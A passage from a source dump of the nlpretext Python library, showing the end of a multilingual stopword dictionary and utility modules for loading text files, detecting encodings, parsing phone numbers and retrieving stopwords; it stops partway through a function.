"кой",
"който",
"колко",
"която",
"къде",
"където",
"към",
"лесен",
"лесно",
"ли",
"лош",
"м",
"май",
"малко",
"ме",
"между",
"мек",
"мен",
"месец",
"ми",
"много",
"мнозина",
"мога",
"могат",
"може",
"мокър",
"моля",
"момента",
"му",
"н",
"на",
"над",
"назад",
"най",
"направи",
"напред",
"например",
"нас",
"не",
"него",
"нещо",
"нея",
"ни",
"ние",
"никой",
"нито",
"нищо",
"но",
"нов",
"нова",
"нови",
"новина",
"някои",
"някой",
"няколко",
"няма",
"обаче",
"около",
"освен",
"особено",
"от",
"отгоре",
"отново",
"още",
"пак",
"по",
"повече",
"повечето",
"под",
"поне",
"поради",
"после",
"почти",
"прави",
"пред",
"преди",
"през",
"при",
"пък",
"първата",
"първи",
"първо",
"пъти",
"равен",
"равна",
"с",
"са",
"сам",
"само",
"се",
"сега",
"си",
"син",
"скоро",
"след",
"следващ",
"сме",
"смях",
"според",
"сред",
"срещу",
"сте",
"съм",
"със",
"също",
"т",
"т.н.",
"тази",
"така",
"такива",
"такъв",
"там",
"твой",
"те",
"тези",
"ти",
"то",
"това",
"тогава",
"този",
"той",
"толкова",
"точно",
"три",
"трябва",
"тук",
"тъй",
"тя",
"тях",
"у",
"утре",
"харесва",
"хиляди",
"ч",
"часа",
"че",
"често",
"чрез",
"ще",
"щом",
"юмрук",
"я",
"як",
],
"bn": [
"অনেক",
"অন্য",
"অবশ্য",
"আগে",
"আছে",
"আজ",
"আবার",
"আমরা",
"আমাদের",
"আর",
"ই",
"উত্তর",
"উপর",
"উপরে",
"এ",
"এই",
"এক্",
"এখন",
"এত",
"এব",
"এমন",
"এমনি",
"এর",
"এস",
"এসে",
"ও",
"ওই",
"কমনে",
"করা",
"করে",
"কাছে",
"কাজ",
"কাজে",
"কারণ",
"কি",
"কিছু",
"কে",
"কেউ",
"কেখা",
"কেন",
"কোটি",
"কোনো",
"কয়েক",
"খুব",
"গিয়ে",
"গেল",
"চার",
"চালু",
"চেষ্টা",
"ছিল",
"জানা",
"জ্নজন",
"টি",
"তখন",
"তবে",
"তা",
"তাই",
"তো",
"থাকা",
"থেকে",
"দিন",
"দু",
"দুই",
"দেওয়া",
"ধামার",
"নতুন",
"না",
"নাগাদ",
"নিয়ে",
"নেওয়া",
"নয়",
"পর",
"পরে",
"পাচ",
"পি",
"পেয়্র্",
"প্রতি",
"প্রথম",
"প্রযন্ত",
"প্রাথমিক",
"প্রায়",
"বক্তব্য",
"বন",
"বলা",
"বলে",
"বলেন",
"বহু",
"বা",
"বি",
"বিভিন্ন",
"বেশ",
"বেশি",
"মতো",
"মধ্যে",
"মনে",
"যখন",
"যদি",
"যা",
"যাওয়া",
"যে",
"র",
"রকম",
"লক্ষ",
"শুধু",
"শুরু",
"সঙ্গে",
"সব",
"সহ",
"সাধারণ",
"সামনে",
"সি",
"সে",
"সেই",
"হতে",
"হাজার",
"হয়",
],
"fa": [
"آباد",
"آره",
"آری",
"آمد",
"آمده",
"آن",
"آنان",
"آنجا",
"آنكه",
"آنها",
"آنچه",
"آورد",
"آورده",
"آيد",
"آیا",
"اثرِ",
"از",
"است",
"استفاده",
"اش",
"اكنون",
"البته",
"البتّه",
"ام",
"اما",
"امروز",
"امسال",
"اند",
"انکه",
"او",
"اول",
"اي",
"ايشان",
"ايم",
"اين",
"اينكه",
"اگر",
"با",
"بار",
"بارة",
"باره",
"باشد",
"باشند",
"باشيم",
"بالا",
"بالایِ",
"بايد",
"بدون",
"بر",
"برابرِ",
"براساس",
"براي",
"برایِ",
"برخوردار",
"برخي",
"برداري",
"بروز",
"بسيار",
"بسياري",
"بعد",
"بعری",
"بعضي",
"بلكه",
"بله",
"بلکه",
"بلی",
"بنابراين",
"بندي",
"به",
"بهترين",
"بود",
"بودن",
"بودند",
"بوده",
"بي",
"بيست",
"بيش",
"بيشتر",
"بيشتري",
"بين",
"بی",
"بیرونِ",
"تا",
"تازه",
"تاكنون",
"تان",
"تحت",
"تر",
"ترين",
"تمام",
"تمامي",
"تنها",
"تواند",
"توانند",
"توسط",
"تولِ",
"تویِ",
"جا",
"جاي",
"جايي",
"جدا",
"جديد",
"جريان",
"جز",
"جلوگيري",
"جلویِ",
"حتي",
"حدودِ",
"حق",
"خارجِ",
"خدمات",
"خواست",
"خواهد",
"خواهند",
"خواهيم",
"خود",
"خويش",
"خیاه",
"داد",
"دادن",
"دادند",
"داده",
"دارد",
"دارند",
"داريم",
"داشت",
"داشتن",
"داشتند",
"داشته",
"دانست",
"دانند",
"در",
"درباره",
"دنبالِ",
"ده",
"دهد",
"دهند",
"دو",
"دوم",
"ديده",
"ديروز",
"ديگر",
"ديگران",
"ديگري",
"دیگر",
"را",
"راه",
"رفت",
"رفته",
"روب",
"روزهاي",
"روي",
"رویِ",
"ريزي",
"زياد",
"زير",
"زيرا",
"زیرِ",
"سابق",
"ساخته",
"سازي",
"سراسر",
"سریِ",
"سعي",
"سمتِ",
"سوم",
"سوي",
"سویِ",
"سپس",
"شان",
"شايد",
"شد",
"شدن",
"شدند",
"شده",
"شش",
"شما",
"شناسي",
"شود",
"شوند",
"صورت",
"ضدِّ",
"ضمن",
"طبقِ",
"طريق",
"طور",
"طي",
"عقبِ",
"علّتِ",
"عنوانِ",
"غير",
"فقط",
"فكر",
"فوق",
"قابل",
"قبل",
"قصدِ",
"كرد",
"كردم",
"كردن",
"كردند",
"كرده",
"كسي",
"كل",
"كمتر",
"كند",
"كنم",
"كنند",
"كنيد",
"كنيم",
"كه",
"لطفاً",
"ما",
"مان",
"مانند",
"مانندِ",
"مثل",
"مثلِ",
"مختلف",
"مدّتی",
"مردم",
"مرسی",
"مقابل",
"من",
"مورد",
"مي",
"ميليارد",
"ميليون",
"مگر",
"ناشي",
"نام",
"نبايد",
"نبود",
"نخست",
"نخستين",
"نخواهد",
"ندارد",
"ندارند",
"نداشته",
"نزديك",
"نزدِ",
"نزدیکِ",
"نشان",
"نشده",
"نظير",
"نكرده",
"نمايد",
"نمي",
"نه",
"نوعي",
"نيز",
"نيست",
"ها",
"هاي",
"هايي",
"هر",
"هرگز",
"هزار",
"هست",
"هستند",
"هستيم",
"هفت",
"هم",
"همان",
"همه",
"همواره",
"همين",
"همچنان",
"همچنين",
"همچون",
"همین",
"هنوز",
"هنگام",
"هنگامِ",
"هنگامی",
"هيچ",
"هیچ",
"و",
"وسطِ",
"وقتي",
"وقتیکه",
"ولی",
"وي",
"وگو",
"يا",
"يابد",
"يك",
"يكديگر",
"يكي",
"ّه",
"پاعینِ",
"پس",
"پنج",
"پيش",
"پیش",
"پیشِ",
"چرا",
"چطور",
"چند",
"چندین",
"چنين",
"چه",
"چهار",
"چون",
"چيزي",
"چگونه",
"چیز",
"چیزی",
"چیست",
"کجا",
"کجاست",
"کدام",
"کس",
"کسی",
"کنارِ",
"که",
"کَی",
"کی",
"گذاري",
"گذاشته",
"گردد",
"گرفت",
"گرفته",
"گروهي",
"گفت",
"گفته",
"گويد",
"گويند",
"گيرد",
"گيري",
"یا",
"یک",
],
"hi": [
"अंदर",
"अत",
"अदि",
"अप",
"अपना",
"अपनि",
"अपनी",
"अपने",
"अभि",
"अभी",
"आदि",
"आप",
"इंहिं",
"इंहें",
"इंहों",
"इतयादि",
"इत्यादि",
"इन",
"इनका",
"इन्हीं",
"इन्हें",
"इन्हों",
"इस",
"इसका",
"इसकि",
"इसकी",
"इसके",
"इसमें",
"इसि",
"इसी",
"इसे",
"उंहिं",
"उंहें",
"उंहों",
"उन",
"उनका",
"उनकि",
"उनकी",
"उनके",
"उनको",
"उन्हीं",
"उन्हें",
"उन्हों",
"उस",
"उसके",
"उसि",
"उसी",
"उसे",
"एक",
"एवं",
"एस",
"एसे",
"ऐसे",
"ओर",
"और",
"कइ",
"कई",
"कर",
"करता",
"करते",
"करना",
"करने",
"करें",
"कहते",
"कहा",
"का",
"काफि",
"काफ़ी",
"कि",
"किंहें",
"किंहों",
"कितना",
"किन्हें",
"किन्हों",
"किया",
"किर",
"किस",
"किसि",
"किसी",
"किसे",
"की",
"कुछ",
"कुल",
"के",
"को",
"कोइ",
"कोई",
"कोन",
"कोनसा",
"कौन",
"कौनसा",
"गया",
"घर",
"जब",
"जहाँ",
"जहां",
"जा",
"जिंहें",
"जिंहों",
"जितना",
"जिधर",
"जिन",
"जिन्हें",
"जिन्हों",
"जिस",
"जिसे",
"जीधर",
"जेसा",
"जेसे",
"जैसा",
"जैसे",
"जो",
"तक",
"तब",
"तरह",
"तिंहें",
"तिंहों",
"तिन",
"तिन्हें",
"तिन्हों",
"तिस",
"तिसे",
"तो",
"था",
"थि",
"थी",
"थे",
"दबारा",
"दवारा",
"दिया",
"दुसरा",
"दुसरे",
"दूसरे",
"दो",
"द्वारा",
"न",
"नहिं",
"नहीं",
"ना",
"निचे",
"निहायत",
"नीचे",
"ने",
"पर",
"पहले",
"पुरा",
"पूरा",
"पे",
"फिर",
"बनि",
"बनी",
"बहि",
"बही",
"बहुत",
"बाद",
"बाला",
"बिलकुल",
"भि",
"भितर",
"भी",
"भीतर",
"मगर",
"मानो",
"मे",
"में",
"यदि",
"यह",
"यहाँ",
"यहां",
"यहि",
"यही",
"या",
"यिह",
"ये",
"रखें",
"रवासा",
"रहा",
"रहे",
"ऱ्वासा",
"लिए",
"लिये",
"लेकिन",
"व",
"वगेरह",
"वरग",
"वर्ग",
"वह",
"वहाँ",
"वहां",
"वहिं",
"वहीं",
"वाले",
"वुह",
"वे",
"वग़ैरह",
"संग",
"सकता",
"सकते",
"सबसे",
"सभि",
"सभी",
"साथ",
"साबुत",
"साभ",
"सारा",
"से",
"सो",
"हि",
"ही",
"हुअ",
"हुआ",
"हुइ",
"हुई",
"हुए",
"हे",
"हें",
"है",
"हैं",
"हो",
"होता",
"होति",
"होती",
"होते",
"होना",
"होने",
],
"mr": [
"अधिक",
"अनेक",
"अशी",
"असलयाचे",
"असलेल्या",
"असा",
"असून",
"असे",
"आज",
"आणि",
"आता",
"आपल्या",
"आला",
"आली",
"आले",
"आहे",
"आहेत",
"एक",
"एका",
"कमी",
"करणयात",
"करून",
"का",
"काम",
"काय",
"काही",
"किवा",
"की",
"केला",
"केली",
"केले",
"कोटी",
"गेल्या",
"घेऊन",
"जात",
"झाला",
"झाली",
"झाले",
"झालेल्या",
"टा",
"डॉ",
"तर",
"तरी",
"तसेच",
"ता",
"ती",
"तीन",
"ते",
"तो",
"त्या",
"त्याचा",
"त्याची",
"त्याच्या",
"त्याना",
"त्यानी",
"त्यामुळे",
"त्री",
"दिली",
"दोन",
"न",
"नाही",
"निर्ण्य",
"पण",
"पम",
"परयतन",
"पाटील",
"म",
"मात्र",
"माहिती",
"मी",
"मुबी",
"म्हणजे",
"म्हणाले",
"म्हणून",
"या",
"याचा",
"याची",
"याच्या",
"याना",
"यानी",
"येणार",
"येत",
"येथील",
"येथे",
"लाख",
"व",
"व्यकत",
"सर्व",
"सागित्ले",
"सुरू",
"हजार",
"हा",
"ही",
"हे",
"होणार",
"होत",
"होता",
"होती",
"होते",
],
"ro": [
"acea",
"aceasta",
"această",
"aceea",
"acei",
"aceia",
"acel",
"acela",
"acele",
"acelea",
"acest",
"acesta",
"aceste",
"acestea",
"aceşti",
"aceştia",
"acolo",
"acord",
"acum",
"ai",
"aia",
"aibă",
"aici",
"al",
"ale",
"alea",
"altceva",
"altcineva",
"am",
"ar",
"are",
"asemenea",
"asta",
"astea",
"astăzi",
"asupra",
"au",
"avea",
"avem",
"aveţi",
"azi",
"aş",
"aşadar",
"aţi",
"bine",
"bucur",
"bună",
"ca",
"care",
"caut",
"ce",
"cel",
"ceva",
"chiar",
"cinci",
"cine",
"cineva",
"contra",
"cu",
"cum",
"cumva",
"curând",
"curînd",
"când",
"cât",
"câte",
"câtva",
"câţi",
"cînd",
"cît",
"cîte",
"cîtva",
"cîţi",
"că",
"căci",
"cărei",
"căror",
"cărui",
"către",
"da",
"dacă",
"dar",
"datorită",
"dată",
"dau",
"de",
"deci",
"deja",
"deoarece",
"departe",
"deşi",
"din",
"dinaintea",
"dintr-",
"dintre",
"doi",
"doilea",
"două",
"drept",
"după",
"dă",
"ea",
"ei",
"el",
"ele",
"eram",
"este",
"eu",
"eşti",
"face",
"fata",
"fi",
"fie",
"fiecare",
"fii",
"fim",
"fiu",
"fiţi",
"frumos",
"fără",
"graţie",
"halbă",
"iar",
"ieri",
"la",
"le",
"li",
"lor",
"lui",
"lângă",
"lîngă",
"mai",
"mea",
"mei",
"mele",
"mereu",
"meu",
"mi",
"mie",
"mine",
"mult",
"multă",
"mulţi",
"mulţumesc",
"mâine",
"mîine",
"mă",
"ne",
"nevoie",
"nici",
"nicăieri",
"nimeni",
"nimeri",
"nimic",
"nişte",
"noastre",
"noastră",
"noi",
"noroc",
"nostru",
"nouă",
"noştri",
"nu",
"opt",
"ori",
"oricare",
"orice",
"oricine",
"oricum",
"oricând",
"oricât",
"oricînd",
"oricît",
"oriunde",
"patra",
"patru",
"patrulea",
"pe",
"pentru",
"peste",
"pic",
"poate",
"pot",
"prea",
"prima",
"primul",
"prin",
"printr-",
"puţin",
"puţina",
"puţină",
"până",
"pînă",
"rog",
"sa",
"sale",
"sau",
"se",
"spate",
"spre",
"sub",
"sunt",
"suntem",
"sunteţi",
"sută",
"sînt",
"sîntem",
"sînteţi",
"să",
"săi",
"său",
"ta",
"tale",
"te",
"timp",
"tine",
"toate",
"toată",
"tot",
"totuşi",
"toţi",
"trei",
"treia",
"treilea",
"tu",
"tăi",
"tău",
"un",
"una",
"unde",
"undeva",
"unei",
"uneia",
"unele",
"uneori",
"unii",
"unor",
"unora",
"unu",
"unui",
"unuia",
"unul",
"vi",
"voastre",
"voastră",
"voi",
"vostru",
"vouă",
"voştri",
"vreme",
"vreo",
"vreun",
"vă",
"zece",
"zero",
"zi",
"zice",
"îi",
"îl",
"îmi",
"împotriva",
"în",
"înainte",
"înaintea",
"încotro",
"încât",
"încît",
"între",
"întrucât",
"întrucît",
"îţi",
"ăla",
"ălea",
"ăsta",
"ăstea",
"ăştia",
"şapte",
"şase",
"şi",
"ştiu",
"ţi",
"ţie",
],
"en": [
"a",
"a's",
"able",
"about",
"above",
"according",
"accordingly",
"across",
"actually",
"after",
"afterwards",
"again",
"against",
"ain't",
"all",
"allow",
"allows",
"almost",
"alone",
"along",
"already",
"also",
"although",
"always",
"am",
"among",
"amongst",
"an",
"and",
"another",
"any",
"anybody",
"anyhow",
"anyone",
"anything",
"anyway",
"anyways",
"anywhere",
"apart",
"appear",
"appreciate",
"appropriate",
"are",
"aren't",
"around",
"as",
"aside",
"ask",
"asking",
"associated",
"at",
"available",
"away",
"awfully",
"b",
"be",
"became",
"because",
"become",
"becomes",
"becoming",
"been",
"before",
"beforehand",
"behind",
"being",
"believe",
"below",
"beside",
"besides",
"best",
"better",
"between",
"beyond",
"both",
"brief",
"but",
"by",
"c",
"c'mon",
"c's",
"came",
"can",
"can't",
"cannot",
"cant",
"cause",
"causes",
"certain",
"certainly",
"changes",
"clearly",
"co",
"com",
"come",
"comes",
"concerning",
"consequently",
"consider",
"considering",
"contain",
"containing",
"contains",
"corresponding",
"could",
"couldn't",
"course",
"currently",
"d",
"definitely",
"described",
"despite",
"did",
"didn't",
"different",
"do",
"does",
"doesn't",
"doing",
"don't",
"done",
"down",
"downwards",
"during",
"e",
"each",
"edu",
"eg",
"eight",
"either",
"else",
"elsewhere",
"enough",
"entirely",
"especially",
"et",
"etc",
"even",
"ever",
"every",
"everybody",
"everyone",
"everything",
"everywhere",
"ex",
"exactly",
"example",
"except",
"f",
"far",
"few",
"fifth",
"first",
"five",
"followed",
"following",
"follows",
"for",
"former",
"formerly",
"forth",
"four",
"from",
"further",
"furthermore",
"g",
"get",
"gets",
"getting",
"given",
"gives",
"go",
"goes",
"going",
"gone",
"got",
"gotten",
"greetings",
"h",
"had",
"hadn't",
"happens",
"hardly",
"has",
"hasn't",
"have",
"haven't",
"having",
"he",
"he's",
"hello",
"help",
"hence",
"her",
"here",
"here's",
"hereafter",
"hereby",
"herein",
"hereupon",
"hers",
"herself",
"hi",
"him",
"himself",
"his",
"hither",
"hopefully",
"how",
"howbeit",
"however",
"i",
"i'd",
"i'll",
"i'm",
"i've",
"ie",
"if",
"ignored",
"immediate",
"in",
"inasmuch",
"inc",
"indeed",
"indicate",
"indicated",
"indicates",
"inner",
"insofar",
"instead",
"into",
"inward",
"is",
"isn't",
"it",
"it'd",
"it'll",
"it's",
"its",
"itself",
"j",
"just",
"k",
"keep",
"keeps",
"kept",
"know",
"known",
"knows",
"l",
"last",
"lately",
"later",
"latter",
"latterly",
"least",
"less",
"lest",
"let",
"let's",
"like",
"liked",
"likely",
"little",
"look",
"looking",
"looks",
"ltd",
"m",
"mainly",
"many",
"may",
"maybe",
"me",
"mean",
"meanwhile",
"merely",
"might",
"more",
"moreover",
"most",
"mostly",
"much",
"must",
"my",
"myself",
"n",
"name",
"namely",
"nd",
"near",
"nearly",
"necessary",
"need",
"needs",
"neither",
"never",
"nevertheless",
"new",
"next",
"nine",
"no",
"nobody",
"non",
"none",
"noone",
"nor",
"normally",
"not",
"nothing",
"novel",
"now",
"nowhere",
"o",
"obviously",
"of",
"off",
"often",
"oh",
"ok",
"okay",
"old",
"on",
"once",
"one",
"ones",
"only",
"onto",
"or",
"other",
"others",
"otherwise",
"ought",
"our",
"ours",
"ourselves",
"out",
"outside",
"over",
"overall",
"own",
"p",
"particular",
"particularly",
"per",
"perhaps",
"placed",
"please",
"plus",
"possible",
"presumably",
"probably",
"provides",
"q",
"que",
"quite",
"qv",
"r",
"rather",
"rd",
"re",
"really",
"reasonably",
"regarding",
"regardless",
"regards",
"relatively",
"respectively",
"right",
"s",
"said",
"same",
"saw",
"say",
"saying",
"says",
"second",
"secondly",
"see",
"seeing",
"seem",
"seemed",
"seeming",
"seems",
"seen",
"self",
"selves",
"sensible",
"sent",
"serious",
"seriously",
"seven",
"several",
"shall",
"she",
"should",
"shouldn't",
"since",
"six",
"so",
"some",
"somebody",
"somehow",
"someone",
"something",
"sometime",
"sometimes",
"somewhat",
"somewhere",
"soon",
"sorry",
"specified",
"specify",
"specifying",
"still",
"sub",
"such",
"sup",
"sure",
"t",
"t's",
"take",
"taken",
"tell",
"tends",
"th",
"than",
"thank",
"thanks",
"thanx",
"that",
"that's",
"thats",
"the",
"their",
"theirs",
"them",
"themselves",
"then",
"thence",
"there",
"there's",
"thereafter",
"thereby",
"therefore",
"therein",
"theres",
"thereupon",
"these",
"they",
"they'd",
"they'll",
"they're",
"they've",
"think",
"third",
"this",
"thorough",
"thoroughly",
"those",
"though",
"three",
"through",
"throughout",
"thru",
"thus",
"to",
"together",
"too",
"took",
"toward",
"towards",
"tried",
"tries",
"truly",
"try",
"trying",
"twice",
"two",
"u",
"un",
"under",
"unfortunately",
"unless",
"unlikely",
"until",
"unto",
"up",
"upon",
"us",
"use",
"used",
"useful",
"uses",
"using",
"usually",
"uucp",
"v",
"value",
"various",
"very",
"via",
"viz",
"vs",
"w",
"want",
"wants",
"was",
"wasn't",
"way",
"we",
"we'd",
"we'll",
"we're",
"we've",
"welcome",
"well",
"went",
"were",
"weren't",
"what",
"what's",
"whatever",
"when",
"whence",
"whenever",
"where",
"where's",
"whereafter",
"whereas",
"whereby",
"wherein",
"whereupon",
"wherever",
"whether",
"which",
"while",
"whither",
"who",
"who's",
"whoever",
"whole",
"whom",
"whose",
"why",
"will",
"willing",
"wish",
"with",
"within",
"without",
"won't",
"wonder",
"would",
"wouldn't",
"x",
"y",
"yes",
"yet",
"you",
"you'd",
"you'll",
"you're",
"you've",
"your",
"yours",
"yourself",
"yourselves",
"z",
"zero",
],
}
================================================
FILE: nlpretext/_utils/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/_utils/daskloader.py
================================================
# mypy: disable-error-code="attr-defined"
from typing import List, Union
import dask.bag as db
import dask.dataframe as dd
def read_text(files_path: Union[str, List[str]], encoding: str): # type: ignore
return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe()
def read_json(files_path: Union[str, List[str]], encoding: str): # type: ignore
return dd.read_json(files_path, encoding=encoding)
def read_csv(files_path: Union[str, List[str]], encoding: str): # type: ignore
return dd.read_csv(files_path, encoding=encoding)
def read_parquet(files_path: Union[str, List[str]], encoding: str): # type: ignore
return dd.read_parquet(files_path, encoding=encoding)
================================================
FILE: nlpretext/_utils/file_loader.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="assignment"
from typing import List, Union
import chardet
from nlpretext._config import constants
def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str:
"""
Predict a file's encoding using chardet.
Parameters
----------
file_path_or_string : string
if filepath, will open the file. Otherwise will predict from the string
n_lines : int
number of line to predict from
Returns
-------
string
the code of the detected encoding
"""
if isinstance(file_path_or_string, bytes):
rawdata = file_path_or_string
else:
with open(file_path_or_string, "rb") as f:
rawdata = b"".join([f.readline() for _ in range(n_lines)])
chardet_value: str = chardet.detect(rawdata)
return chardet_value
def check_text_file_format(filepath: Union[str, List[str]]) -> str:
"""
Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.
Parameters
----------
filepath : str | list(str)
A filepath with wildcard (eg. *.txt), or a list of filepaths.
Returns
-------
str
Format of the specified file path, among .json, .csv, .parquet or .txt
"""
pattern = constants.TEXT_FILE_FORMATS_PATTERN
if not isinstance(filepath, (list, tuple)):
filepath = [filepath]
format_re_list = [pattern.match(path) for path in filepath]
format_list = [format_re.group(1) for format_re in format_re_list if format_re]
if len(set(format_list)) > 1:
raise ValueError(f"Multiple file formats found in file path list: {format_list}")
if None in format_re_list:
raise ValueError(
"Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted" # noqa: E501
)
file_format = format_list[0]
return file_format
================================================
FILE: nlpretext/_utils/pandasloader.py
================================================
from typing import List, Union
import pandas as pd
from fsspec import open_files
def _list_handler(func):
def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame: # type: ignore
list_files = open_files(file_path)
list_df = [func(file.path, *args, **kwargs) for file in list_files]
df = pd.concat(list_df)
return df
return wrapper_list_handler
@_list_handler
def read_text(file_path: str, encoding: str) -> pd.DataFrame:
df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])
return df
@_list_handler
def read_json(file_path: str, encoding: str) -> pd.DataFrame:
df = pd.read_json(file_path, encoding=encoding)
return df
@_list_handler
def read_csv(file_path: str, encoding: str) -> pd.DataFrame:
df = pd.read_csv(file_path, encoding=encoding)
return df
@_list_handler
def read_parquet(file_path: str, encoding: str) -> pd.DataFrame:
df = pd.read_parquet(file_path, encoding=encoding)
return df
================================================
FILE: nlpretext/_utils/phone_number.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from typing import List, Optional
import phonenumbers as _phonenumbers
from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY
def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:
"""
Python port of Google's libphonenumber.
https://github.com/daviddrysdale/python-phonenumbers.
Parameters
----------
region_code : str, optional
If specified, will find the number of the specified country.
eg. 06.00.00.00.00 if "FR" is specified.
If not specified, only works for international-formatted phone numbers.
- ie. phone number with +country code specified
eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
supported value: look SUPPORTED_COUNTRY variable.
Returns
-------
list
list of matched phone numbers.
Raises
------
ValueError
if country code is not supported.
"""
if region_code not in SUPPORTED_COUNTRY:
raise ValueError("Please enter a valid contry code. See SUPPORTED_COUNTRY list.")
return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]
def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:
"""
Find phone numbers in a text, returns a list of phone numbers.
Parameters
----------
text : str
countrylist : list (eg. [None,'FR','US','GB'])
Look for phone numbers formatted according to the specified countlist.
supported value: look SUPPORTED_COUNTRY variable.
Returns
-------
list
List of unique phone numbers found.
"""
all_phone_numbers: List[str] = []
for country in countrylist:
new_numbers_founds = find_phone_numbers(text, region_code=country)
all_phone_numbers.extend(new_numbers_founds)
return list(set(all_phone_numbers))
class PhoneParser:
"""
Python port of Google's libphonenumber.
https://github.com/daviddrysdale/python-phonenumbers.
"""
def __init__(self):
self.region_code = None
self.text = None
self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None
@property
def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]:
return self.__parsed_num
@parsed_num.setter
def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None:
self.__parsed_num = value
def parse_number(
self, text: str, region_code: Optional[str] = None
) -> Optional[_phonenumbers.PhoneNumber]:
"""
Extract phone number from text.
Parameters
----------
text: str
region_code : str, optional
If specified, will find the number of the specified country.
eg. 06.00.00.00.00 if "FR" is specified.
If not specified, only works for international-formatted phone numbers.
- ie. phone number with +country code specified
eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
supported value: look SUPPORTED_COUNTRY variable.
Returns
-------
str
The parsed number
Raises
------
NumberParseException
If the string doesn't contains phone number of is the parser fails.
"""
self.region_code = region_code
self.text = text
self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse(
self.text, self.region_code
)
return self.parsed_num
def format_number(self, num_format: str) -> str:
"""
Convert a phone number to another standard format.
Parameters
----------
num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}
Returns
-------
str
Number formatted
"""
standard_format = FORMAT_NUMBERS.get(num_format)
if standard_format is None:
raise ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}")
if self.parsed_num is None:
raise ValueError(f"Could not parse phone number {self.parsed_num}")
formatted_number: Optional[str] = _phonenumbers.format_number(
self.parsed_num, standard_format
)
if formatted_number is None:
raise ValueError(f"Could not format phone number {formatted_number}")
return formatted_number
================================================
FILE: nlpretext/_utils/stopwords.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List
from nlpretext._config.stopwords import STOPWORDS
from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING
from stop_words import get_stop_words as _get_stop_words
def get_stopwords(lang: str = "en") -> List[str]:
"""Input a language code, returns a list of stopwords for the specified language.
Parameters
----------
lang : str
Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en',
'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru',
'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo',
'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl',
'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl',
'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th',
'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en']
Returns
-------
list
list of stopwords for a given language
Raises
------
ValueError
When language is not available yet or incorrect country code
"""
if isinstance(lang, str) and len(lang) == 2:
lang = lang.lower()
custom_stopwords = STOPWORDS
stopwords = []
supported_lang_lib = list(_LANGUAGE_MAPPING.keys())
supported_lang_custom = list(custom_stopwords.keys())
supported_lang = supported_lang_lib + supported_lang_custom
if lang in supported_lang:
if lang in supported_lang_lib:
stopwords += _get_stop_words(lang)
if lang in supported_lang_custom:
stopwords += custom_stopwords[lang]
else:
raise ValueError(
"Language not available yet or incorrect country code."
f" Supported languages: {supported_lang}"
)
else:
